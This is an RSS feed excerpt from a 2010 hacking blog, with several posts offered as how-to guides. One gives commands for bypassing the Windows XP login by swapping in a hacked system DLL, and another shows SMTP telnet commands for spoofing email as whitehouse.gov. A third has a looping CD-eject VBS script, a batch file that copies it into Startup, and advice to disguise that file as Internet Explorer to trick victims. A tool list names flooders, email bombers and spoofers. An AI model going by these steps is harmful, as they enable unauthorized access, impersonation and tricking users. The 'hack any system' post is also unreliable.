(Unknown)</author><pubDate>Mon, 22 Nov 2010 11:46:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-8338924977760170901</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;/div&gt;
Steps to Hack into a Windows XP Computer without changing password:&lt;br /&gt;
&lt;br /&gt;
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.&lt;br /&gt;
2. Download DreamPackPL from &lt;a href="http://www.d--b.webpark.pl/down/dreampackpl_iso.zip"&gt;Official website&lt;/a&gt;&lt;br /&gt;
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.&lt;br /&gt;
4. Use any burning program that can burn ISO images.&lt;br /&gt;
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.&lt;br /&gt;
6. Press “R” to install DreamPackPL.&lt;br /&gt;
7. Press “C” to install DreamPackPL by using the recovery console.&lt;br /&gt;
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
9. Backup your original sfcfiles.dll by typing:&lt;br /&gt;
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)&lt;br /&gt;
10. Copy the hacked file from CD to system32 folder. Type:&lt;br /&gt;
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)&lt;br /&gt;
11. Type “exit”, take out disk and reboot.&lt;br /&gt;
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.&lt;br /&gt;
13. Click the top graphic on the DreamPack menu and you will get a menu popup.&lt;br /&gt;
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws&lt;br /&gt;
14. Go to commands and enable the options and enable the god command.&lt;br /&gt;
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws&lt;br /&gt;
15. Type “god” in the password field to get in Windows.&lt;br /&gt;
&lt;br /&gt;
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note:&lt;/b&gt; I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Fastest Way to Hack into Others System</title><link>http://0dl.blogspot.com/2010/11/fastest-way-to-hack-into-others-system.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:42:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-1438041849349664493</guid><description>&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;Well as I already mentioned you can hack any system which is connected to what we call “The INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Steps: -&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Download the Software PORT SCANNER from google.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Get the IP address of the victim whose port is open.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The IP of victim u found initially into NETLAB .&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Thats it now you can access his system.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Note&lt;/strong&gt;&amp;nbsp;: This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Good Luck!&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Learn how to send your fake email</title><link>http://0dl.blogspot.com/2010/11/learn-how-to-send-your-fake-email.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:41:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-7544381085920923490</guid><description>So, you want to learn how to send your own fake mail? It’s extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux – any modern PC that has an internet connection will do it.&lt;br /&gt;
&lt;br /&gt;
There are a just a few simple steps. First, you’ll need to decide on the &lt;b&gt;FROM &lt;/b&gt;and the &lt;b&gt;TO &lt;/b&gt;email addresses. If the FROM address that you’re choosing isn’t a real one, make sure that the domain name (the bit after the &lt;b&gt;@ &lt;/b&gt;sign) is a real one. If it’s not a real one, it almost certainly won’t work.&lt;br /&gt;
&lt;br /&gt;
For the purpose of this tutorial, we’ll be sending from &lt;b&gt;bush@whitehouse.gov&lt;/b&gt; to &lt;b&gt;dummy@anysite.com&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Second, you’ll need to find out the mail server that your recipient is using.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://deadfake.com/img/windows.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://deadfake.com/img/windows.png" /&gt;&lt;/a&gt;Click Start, Run, enter “CMD”, then presss OK. In the window that comes up, type nslookup -q=MX anysite.com&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://deadfake.com/img/mac.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://deadfake.com/img/mac.png" /&gt;&lt;/a&gt;Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://deadfake.com/img/linux.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://deadfake.com/img/linux.png" /&gt;&lt;/a&gt;Bring up your favourite shell, and type nslookup -q=MX anysite.com&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
There will be a lot of information on the screen – all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest “preference number”.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;anysite.com        MX preference = 10, mail exchanger = mail.anysite.com&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now, you’ll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default – see this note about getting telnet on Vista before you continue. When you’re ready, type:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;telnet mail.anysite.com 25&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Press enter, and after a short pause, you should see a welcome message from the server.&lt;br /&gt;
&lt;br /&gt;
Ok, so now you’re connected. You need to enter the following information – press ENTER at each new line. You won’t be able to press backspace to delete a mistake, so you’ll need to type everything correctly first time!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;HELO whitehouse.gov&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This tells the mail server that we are “whitehouse.gov”.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;MAIL FROM:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This tells the server who is sending the mail.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;RCPT TO:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This tells the server who to deliver the mail to. At this point, if the recipient doesn’t exist, you may see a warning message (but not always).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;DATA&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This tells the server that we’re ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don’t forget that full stop at the end.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Hello dummy@anysite, I managed to send a fake mail all by myself!.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Dont forget that last dot. When you’ve done that, and pressed enter, simply enter QUIT and your mail should be delivered.&lt;br /&gt;
&lt;br /&gt;
There’s a little bit more to it, of course. You’ll need to enter proper “headers” if you want the mail to look more believable. After doing the DATA command, I’d recommend pasting in the following “headers” to make sure it looks realistic when viewed in Outlook, Hotmail, etc.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)From: George W Bush To: Poor Sod Subject: Fake mail&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Hello dummy@anysite, I managed to send a fake mail all by myself!.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
And that’s all there is to it.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Cd Drive Hack</title><link>http://0dl.blogspot.com/2010/11/cd-drive-hack.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:33:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-6042333948395148194</guid><description>Here I will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set wmp = createObject(“wmplayer.ocx.7″)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;set drives = wmp.cdromCollection&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;sub open_saysame()&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;on error resume next&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;do&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;if drives.count &amp;gt;= 1 then&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;for i = 0 to drives.count – 1&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;drives.item(i).eject()&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;next&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;end if&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;loop&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;end sub&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;open_saysame()&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better… so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.&lt;br /&gt;
&lt;br /&gt;
1:)copy CDfun.vbs “c:\Documents and Settings\%username%\Start Menu\Programs\Startup\”&lt;br /&gt;
2:)CDfun.vbs&lt;br /&gt;
&lt;br /&gt;
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called “internet Explorer” and right click to change properties on icon. that way it will look just like Internet Explorer.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Use God Mode in Windows 7 ?</title><link>http://0dl.blogspot.com/2010/11/how-to-use-god-mode-in-windows-7.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 16:47:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-2534862407087839681</guid><description>&lt;strong&gt;How to Use God Mode in Windows 7&lt;/strong&gt;&lt;br /&gt;
Windows 7 is now becoming popular among windows operating system&amp;nbsp;  users.Windows 7 has cool hidden feature ,people calls it &lt;strong&gt;godmode  in windows 7&lt;/strong&gt;.GodMode is a folder that brings together a long  list of customization  settings allowing you to change all your settings  from one place.This is very good as you can now change all your windows  settings from one single place.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img alt="God Mode in Windows 7" class="size-full wp-image-669" src="http://www.hackingtrick.com/wp-content/uploads/2010/11/godmode-icon.png" title="God Mode in Windows 
7" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="wp-caption aligncenter" id="attachment_669" style="width: 270px;"&gt;&lt;div class="wp-caption-text"&gt;God Mode in  Windows 7&lt;/div&gt;&lt;/div&gt;Foll the following steps to create god mode folder:&lt;br /&gt;
1. Create a new folder&lt;br /&gt;
2. Rename the folder to&lt;strong&gt;  GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}&lt;/strong&gt;&lt;br /&gt;
You can change word&lt;strong&gt; GodMode&lt;/strong&gt; to any other word you  like your name or your friends name&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;br /&gt;
3.The folder icon will change ,then&amp;nbsp; double click it to show the &lt;em&gt;GodMode&lt;/em&gt;  windows options.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hacking Software Download for Free</title><link>http://0dl.blogspot.com/2010/11/hacking-software-download-for-free.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 13:33:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-8985570097126352130</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyJoLkydabo2Yfuohet8j0uNzO4LrVpLV8-A7uyAkLDr1yLI6qWEghIdWXewekvlCfzUWnk25QnfCmkIEHb90st3xAZ9Z3fmSBzTB7BeFibYsOh60U6SA_KjsjYg4PlTb44cC5ipJB14I/s1600/nettools.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyJoLkydabo2Yfuohet8j0uNzO4LrVpLV8-A7uyAkLDr1yLI6qWEghIdWXewekvlCfzUWnk25QnfCmkIEHb90st3xAZ9Z3fmSBzTB7BeFibYsOh60U6SA_KjsjYg4PlTb44cC5ipJB14I/s1600/nettools.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Net Tools © 2008 Mohammad Ahmadi Bidakhvidi&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;The Creation&lt;br /&gt;
&lt;/strong&gt;Net Tools is cutting-edge security and  network monitoring software for the Internet and Local Area Networks, providing  clients with the ability and confidence to meet the challenges of tomorrow's  technology. Keeping pace with the industry trends, we offer professional tools  that support the latest standards, protocols, software, and hardware for both  wired and wireless networks. The main goal is the creation of high quality  software. Net Tools is a very strong combination of network scanning, security,  file, system, and administrator tools useful in diagnosing networks and  monitoring your PC and computer's network connections for system administrators.  Next to the essential core tools it includes a lot of extra valuable features.  It’s a Swiss Army knife for everyone interested in a set of powerful network  tools for everyday use. This all-in-one toolkit includes also a lot of handy  file and system utilities next to the huge amount of network tools. The menus  are fully configurable, so in this way you won’t get lost in the extremely large  amount of essential tools. All the additional features will make this  application a must have for all system administrators. There are numerous  constructive and valuable applications included in Net Tools that can be used  for a great amount of purposes. The latest version of Net Tools is hybrid; it  means that it’s capable of working together with applications that are made and  designed for Net Tools, so in this way more flexibility and user-friendliness is  obtained. This software is designed for the Microsoft Windows OS (Windows 98,  NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been  tested on Windows XP. With the 175+ tools it is a great collection of useful  tools for network users. The size of Net Tools 5.0.70 is approximately 25  Mb.&lt;br /&gt;
&lt;strong&gt;Contents&lt;br /&gt;
&lt;/strong&gt;Net Tools 5.0 (build 70) contains a whole  variety of network tools. Here is a list of the most important tools:&lt;br /&gt;
&lt;div style="margin-bottom: 0px;"&gt;1) IP Address Scanner &lt;br /&gt;
2) IP Calculator&lt;br /&gt;
3)  IP Converter&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
4) Port Listener&lt;br /&gt;
5) Port Scanner&lt;br /&gt;
6) Ping &lt;br /&gt;
7) NetStat (2  ways)&lt;br /&gt;
8) Trace Route (2 ways)&lt;br /&gt;
9) TCP/IP Configuration&lt;br /&gt;
10) Online -  Offline Checker&lt;br /&gt;
11) Resolve Host &amp;amp; IP&lt;br /&gt;
12) Time Sync&lt;br /&gt;
13) Whois &amp;amp;  MX Lookup&lt;br /&gt;
14) Connect0r&lt;br /&gt;
15) Connection Analysator and protector&lt;br /&gt;
16) Net  Sender&lt;br /&gt;
17) E-mail seeker&lt;br /&gt;
18) Net Pager&lt;br /&gt;
19) Active and Passive port  scanner&lt;br /&gt;
20) Spoofer&lt;br /&gt;
21) Hack Trapper&lt;br /&gt;
22) HTTP flooder (DoS)&lt;br /&gt;
23) Mass  Website Visiter&lt;br /&gt;
24) Advanced Port Scanner&lt;br /&gt;
25) Trojan Hunter (Multi  IP)&lt;br /&gt;
26) Port Connecter Tool&lt;br /&gt;
27) Advanced Spoofer&lt;br /&gt;
28) Advanced Anonymous  E-mailer&lt;br /&gt;
29) Simple Anonymous E-mailer&lt;br /&gt;
30) Anonymous E-mailer with  Attachment Support&lt;br /&gt;
31) Mass E-mailer&lt;br /&gt;
32) E-mail Bomber&lt;br /&gt;
33) E-mail  Spoofer&lt;br /&gt;
34) Simple Port Scanner (fast)&lt;br /&gt;
35) Advanced Netstat  Monitoring&lt;br /&gt;
36) X Pinger&lt;br /&gt;
37) Web Page Scanner&lt;br /&gt;
38) Fast Port  Scanner&lt;br /&gt;
39) Deep Port Scanner&lt;br /&gt;
40) Fastest Host Scanner (UDP)&lt;br /&gt;
41) Get  Header&lt;br /&gt;
42) Open Port Scanner&lt;br /&gt;
43) Multi Port Scanner&lt;br /&gt;
44) HTTP scanner  (Open port 80 subnet scanner)&lt;br /&gt;
45) Multi Ping for Cisco Routers&lt;br /&gt;
46) TCP  Packet Sniffer&lt;br /&gt;
47) UDP flooder&lt;br /&gt;
48) Resolve and Ping&lt;br /&gt;
49) Multi IP  ping&lt;br /&gt;
50) File Dependency Sniffer&lt;br /&gt;
51) EXE-joiner (bind 2 files)&lt;br /&gt;
52)  Encrypter&lt;br /&gt;
53) Advanced Encryption&lt;br /&gt;
54) File Difference Engine&lt;br /&gt;
55) File  Comparasion&lt;br /&gt;
56) Mass File Renamer&lt;br /&gt;
57) Add Bytes to EXE&lt;br /&gt;
58) Variable  Encryption&lt;br /&gt;
59) Simple File Encryption&lt;br /&gt;
60) ASCII to Binary (and Binary to  ASCII)&lt;br /&gt;
61) Enigma&lt;br /&gt;
62) Password Unmasker&lt;br /&gt;
63) Credit Card Number Validate  and Generate&lt;br /&gt;
64) Create Local HTTP Server&lt;br /&gt;
65) eXtreme UDP Flooder&lt;br /&gt;
66)  Web Server Scanner&lt;br /&gt;
67) Force Reboot&lt;br /&gt;
68) Webpage Info Seeker&lt;br /&gt;
69)  Bouncer&lt;br /&gt;
70) Advanced Packet Sniffer&lt;br /&gt;
71) IRC server creater&lt;br /&gt;
72)  Connection Tester&lt;br /&gt;
73) Fake Mail Sender&lt;br /&gt;
74) Bandwidth Monitor&lt;br /&gt;
75) Remote  Desktop Protocol Scanner&lt;br /&gt;
76) MX Query&lt;br /&gt;
77) Messenger Packet Sniffer&lt;br /&gt;
78)  API Spy&lt;br /&gt;
79) DHCP Restart&lt;br /&gt;
80) File Merger&lt;br /&gt;
81) E-mail Extractor (crawler  / harvester bot)&lt;br /&gt;
82) Open FTP Scanner&lt;br /&gt;
83) Advanced System Locker&lt;br /&gt;
84)  Advanced System Information&lt;br /&gt;
85) CPU Monitor&lt;br /&gt;
86) Windows Startup Manager  &lt;br /&gt;
87) Process Checker&lt;br /&gt;
88) IP String Collecter&lt;br /&gt;
89) Mass Auto-Emailer  (Database mailer; Spammer) &lt;br /&gt;
90) Central Server (Base Server; Echo Server;  Time Server; Telnet Server; HTTP Server; FTP Server)&lt;br /&gt;
91) Fishing Port Scanner  (with named ports) &lt;br /&gt;
92) Mouse Record / Play Automation (Macro Tool)&lt;br /&gt;
93)  Internet / LAN Messenger Chat (Server + Client)&lt;br /&gt;
94) Timer  Shutdown/Restart/Log Off/Hibernate/Suspend/ Control &lt;br /&gt;
95) Hash MD5  Checker&lt;br /&gt;
96) Port Connect - Listen tool&lt;br /&gt;
97) Internet MAC Address Scanner  (Multiple IP) &lt;br /&gt;
98) Connection Manager / Monitor&lt;br /&gt;
99) Direct Peer Connecter  (Send/Receive files + chat) &lt;br /&gt;
100) Force Application Termination (against  Viruses and Spyware)&lt;br /&gt;
101) Easy and Fast Screenshot Maker (also Web Hex Color  Picker) &lt;br /&gt;
102) COM Detect and Test&lt;br /&gt;
103) Create Virtual Drives&lt;br /&gt;
104) URL  Encoder &lt;br /&gt;
105) WEP/WPA Key Generator&lt;br /&gt;
106) Sniffer.NET&lt;br /&gt;
107) File  Shredder&lt;br /&gt;
108) Local Access Enumerater&lt;br /&gt;
109) Steganographer (Art of hiding  secret data in pictures)&lt;br /&gt;
110) Subnet Calculater&lt;br /&gt;
111) Domain to IP  (DNS)&lt;br /&gt;
112) Get SNMP Variables&lt;br /&gt;
113) Internet Explorer Password  Revealer&lt;br /&gt;
114) Advanced Multi Port Scanner&lt;br /&gt;
115) Port Identification List  (+port scanner)&lt;br /&gt;
116) Get Quick Net Info&lt;br /&gt;
117) Get Remote MAC  Address&lt;br /&gt;
118) Share Add&lt;br /&gt;
119) Net Wanderer&lt;br /&gt;
120) WhoIs Console &lt;br /&gt;
121)  Cookies Analyser&lt;br /&gt;
122) Hide Secret Data In Files&lt;br /&gt;
123) Packet  Generator&lt;br /&gt;
124) Secure File Splitting&lt;br /&gt;
125) My File Protection (Password  Protect Files, File Injections)&lt;br /&gt;
126) Dynamic Switch Port Mapper&lt;br /&gt;
127)  Internet Logger (Log URL)&lt;br /&gt;
128) Get Whois Servers&lt;br /&gt;
129) File  Split&amp;amp;Merge&lt;br /&gt;
130) Hide Drive&lt;br /&gt;
131) Extract E-mails from  Documents&lt;br /&gt;
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics,  Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)&lt;br /&gt;
133)  Hook Spy&lt;br /&gt;
134) Software Uninstaller&lt;br /&gt;
135) Tweak &amp;amp; Clean XP&lt;br /&gt;
136)  Steganographic Random Byte Encryption&lt;br /&gt;
137) NetTools Notepad (encrypt your  sensitive data) &lt;br /&gt;
138) File Encrypter/Decrypter&lt;br /&gt;
139) Quick Proxy  Server&lt;br /&gt;
140) Connection Redirector (HTTP, IRC, ... All protocols  supported)&lt;br /&gt;
141) Local E-mail Extractor&lt;br /&gt;
142) Recursive E-mail  Extractor&lt;br /&gt;
143) Outlook Express E-mail Extractor&lt;br /&gt;
144) Telnet Client&lt;br /&gt;
145)  Fast Ip Catcher&lt;br /&gt;
146) Monitor Host IP&lt;br /&gt;
147) FreeMAC (MAC Address  Editor)&lt;br /&gt;
148) QuickFTP Server (+user accounts support)&lt;br /&gt;
149) NetTools Macro  Recorder/Player (Keybord and Mouse Hook)&lt;br /&gt;
150) Network Protocol  Analyzer&lt;br /&gt;
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc  Methods)&lt;br /&gt;
152) WebMirror (Website Ripper)&lt;br /&gt;
153) GeoLocate IP&lt;br /&gt;
154) Google  PageRank Calculator&lt;br /&gt;
155) Google Link Crawler (Web Result Grabber)&lt;br /&gt;
156)  Network Adapter Binder&lt;br /&gt;
157) Remote LAN PC Lister&lt;br /&gt;
158) Fast Sinusoidal  Encryption&lt;br /&gt;
159) Software Scanner&lt;br /&gt;
160) Fast FTP Client&lt;br /&gt;
161) Network  Traffic Analysis &lt;br /&gt;
162) Network Traffic Visualiser&lt;br /&gt;
163) Internet Protocol  Scanner&lt;br /&gt;
164) Net Meter (Bandwidth Traffic Meter)&lt;br /&gt;
165) Net Configuration  Switcher&lt;br /&gt;
166) Advanced System Hardware Info&lt;br /&gt;
167) Live System  Information&lt;br /&gt;
168) Network Profiler&lt;br /&gt;
169) Network Browser&lt;br /&gt;
170) Quick  Website Maker and Web Gallery Creator&lt;br /&gt;
171) Remote PC Shutdown&lt;br /&gt;
172) Serial  Port Terminal&lt;br /&gt;
173) Standard Encryptor&lt;br /&gt;
174) Tray Minimizer&lt;br /&gt;
175) Extra  Tools (nmap console &amp;amp; win32 version)&lt;/div&gt;&lt;div style="margin-top: 0px;"&gt;Many extra features and utilities are included in  this package!&lt;/div&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;strong&gt;Download Net Tools 5.0&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://www.mabsoft.com/NetTools5.0.70.zip" target="_blank"&gt;http://www.mabsoft.com/NetTools5.0.70.zip&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Mirrors&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html" target="_blank"&gt;http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.download.com/Net-Tools/3000-2085_4-10573955.html?tag=pdp_prod" target="_blank"&gt;http://www.download.com/Net-Tools/3000-2085_4-10573955.html?tag=pdp_prod&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mabsoft.com/Net_Tools_5.3786618.TPB.torrent" target="_blank"&gt;http://www.mabsoft.com/Net_Tools_5.3786618.TPB.torrent&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
